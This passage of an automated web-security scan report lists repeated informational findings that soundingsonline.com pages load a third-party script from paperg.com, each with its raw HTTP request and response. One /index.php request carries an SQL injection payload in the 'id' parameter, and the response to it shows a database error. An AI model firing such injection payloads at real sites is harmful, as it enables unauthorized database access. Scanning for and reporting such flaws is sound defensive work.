Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1277. http://www.soundingsonline.com/columns-blogs/new-england-fishing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1278. http://www.soundingsonline.com/columns-blogs/under-way

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1279. http://www.soundingsonline.com/component/chronocontact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1280. http://www.soundingsonline.com/component/content/article/237622

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1281. http://www.soundingsonline.com/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1282. http://www.soundingsonline.com/features

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1283. http://www.soundingsonline.com/features/destinations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1284. http://www.soundingsonline.com/features/in-depth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1285. http://www.soundingsonline.com/features/justyesterday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1286. http://www.soundingsonline.com/features/lifestyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1287. http://www.soundingsonline.com/features/profiles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1288. http://www.soundingsonline.com/features/technical

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1289. http://www.soundingsonline.com/features/type-of-boat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1290. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1291. http://www.soundingsonline.com/more/digital-publications

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

21.1292. http://www.soundingsonline.com/more/the-masters-series

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
